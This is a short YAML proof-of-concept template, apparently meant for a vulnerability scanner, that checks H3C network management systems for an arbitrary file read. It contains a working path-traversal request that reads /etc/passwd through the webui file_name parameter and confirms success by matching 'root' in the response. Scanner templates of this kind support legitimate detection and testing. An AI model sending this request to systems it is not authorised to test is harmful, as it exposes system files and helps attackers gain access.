name: poc-yaml-h3c-nms-arbitrary-file-read
rules:
  - method: GET
    path: "/webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    expression: |
      response.status == 200 && response.body.bcontains(bytes("root"))
detail:
  author: yishuizhe
  name: Arbitrary File Read in H3C Network Management System